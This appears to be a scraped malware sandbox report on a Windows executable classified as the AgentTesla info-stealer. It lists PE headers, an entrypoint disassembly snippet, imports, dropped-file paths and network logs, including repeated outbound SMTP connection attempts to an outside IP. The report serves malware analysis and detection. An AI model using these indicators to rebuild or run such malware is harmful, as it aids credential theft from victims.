Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA669C [Wed Dec 25 05:01:16 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e160ef8e55bb9d162da4e266afd9eef3

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [0040711Ch]
push ebx
call dword ptr [0040728Ch]
push 00000008h
mov dword ptr [007A1FB8h], eax
call 00007F29E4D1DDBAh
mov dword ptr [007A1F04h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079D4B8h
call dword ptr [00407164h]
push 00409180h
push 007A1700h
call 00007F29E4D1DA64h
call dword ptr [00407120h]
mov ebp, 007A7000h
push eax
push ebp
call 00007F29E4D1DA52h
push ebx
call dword ptr [00407118h]
cmp byte ptr [007A7000h], 00000022h
mov dword ptr [007A1F00h], eax
mov eax, ebp
jne 00007F29E4D1B02Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 007A7001h
push dword ptr [esp+14h]
push eax
call 00007F29E4D1D4E2h
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007F29E4D1B0E5h
cmp cl, 00000020h
jne 00007F29E4D1B028h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F29E4D1B01Ch

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d1000	0x28460	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5bc6	0x5c00	1c2121f50aaec3e631d6b7fee7746690	False	0.682022758152174	data	6.511374859754948	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11ce	0x1200	640f709ec19b4ed0455a4c64e5934d5e	False	0.4520399305555556	OpenPGP Secret Key	5.23558258677739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x398ff8	0x400	b0f803610c3eabc488111ca7ad209e8f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a2000	0x2f000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d1000	0x28460	0x28600	e3bcc83e0ea219acebebf71bfbb5b1b1	False	0.1932626257739938	data	4.371839987828179	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3d1358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.16202827398556727
RT_ICON	0x3e1b80	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.1903773386588186
RT_ICON	0x3eb028	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States	0.21769870609981515
RT_ICON	0x3f04b0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.21817430325932924
RT_ICON	0x3f46d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.26649377593360996
RT_ICON	0x3f6c80	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.3374765478424015
RT_ICON	0x3f7d28	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.39549180327868855
RT_ICON	0x3f86b0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.499113475177305
RT_DIALOG	0x3f8b18	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3f8c18	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x3f8d38	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3f8e00	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3f8e60	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0x3f8ed8	0x27c	data	English	United States	0.5110062893081762
RT_MANIFEST	0x3f9158	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 5, 2024 14:29:30.607944965 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:30.607971907 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:30.608048916 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:30.618583918 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:30.618597031 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:31.409698009 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:31.409822941 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:31.462735891 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:31.462773085 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:31.463257074 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:31.463326931 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:31.467201948 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:31.512238979 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.185168028 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.185208082 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.185363054 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.185363054 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.185384989 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.185431004 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.574750900 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.574769020 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.574882984 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.575306892 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.575370073 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.576209068 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.576277971 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.662112951 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.662194967 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.967374086 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.967390060 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.967454910 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.967787981 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.967847109 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.968365908 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.968430996 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.968723059 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.968782902 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:32.969110012 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:32.969165087 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.007661104 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.007775068 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.052598953 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.052675962 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.357769966 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.357814074 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.357899904 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.358783007 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.358854055 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.359581947 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.359658957 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.360053062 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.360112906 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.360893011 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.360955954 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.363617897 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.363698959 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.364008904 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.364067078 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.364495993 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.364557028 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.364875078 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.364933014 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.365427017 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.365494013 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.365847111 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.365906000 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.397474051 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.397674084 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.442064047 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.442148924 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.442998886 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.443084955 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.746762991 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.746778011 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.746896029 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.747373104 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.747486115 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.748425961 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.748524904 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.749711990 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.749813080 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.750442028 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.750509977 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:33.750530005 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.750593901 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.750843048 CEST	49736	443	192.168.2.4	102.67.137.82
Apr 5, 2024 14:29:33.750859022 CEST	443	49736	102.67.137.82	192.168.2.4
Apr 5, 2024 14:29:34.727952957 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.727988958 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.728061914 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.729635000 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.729650021 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.993541002 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.993613958 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.995945930 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:34.995951891 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.996200085 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:34.999180079 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:35.040240049 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:35.336438894 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:35.336507082 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 5, 2024 14:29:35.336554050 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:35.339381933 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 5, 2024 14:29:35.468311071 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:35.617567062 CEST	80	49738	208.95.112.1	192.168.2.4
Apr 5, 2024 14:29:35.618913889 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:35.618954897 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:35.769764900 CEST	80	49738	208.95.112.1	192.168.2.4
Apr 5, 2024 14:29:35.823178053 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:37.071132898 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:37.220423937 CEST	80	49738	208.95.112.1	192.168.2.4
Apr 5, 2024 14:29:37.220551014 CEST	49738	80	192.168.2.4	208.95.112.1
Apr 5, 2024 14:29:38.245733976 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:39.245085955 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:41.245115995 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:45.245493889 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:53.260687113 CEST	49739	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:29:59.311420918 CEST	49741	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:30:00.323172092 CEST	49741	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:30:02.323193073 CEST	49741	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:30:06.323591948 CEST	49741	587	192.168.2.4	41.76.215.87
Apr 5, 2024 14:30:14.323287964 CEST	49741	587	192.168.2.4	41.76.215.87

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 5, 2024 14:29:27.937371016 CEST	63131	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:28.932619095 CEST	63131	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:29.666644096 CEST	53	63131	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:29.666661978 CEST	53	63131	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:34.599587917 CEST	56490	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:34.724447966 CEST	53	56490	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:35.342222929 CEST	64400	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:35.466835022 CEST	53	64400	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:37.071944952 CEST	50033	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:38.057656050 CEST	50033	53	192.168.2.4	1.1.1.1
Apr 5, 2024 14:29:38.244194984 CEST	53	50033	1.1.1.1	192.168.2.4
Apr 5, 2024 14:29:38.244252920 CEST	53	50033

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hnTW5HdWvY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Start Menu\farseringernes.ini

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nkcd1eg.nnq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdlbq1nd.n31.ps1

C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\opbruger.clu

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\tinfoil.uln

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\ugredes.txt

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\yderligheders.arc

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\afgiftsforhjelse.unr

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\antifrictional.bel

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\cumins.fed

Windows Analysis Report
hnTW5HdWvY.exe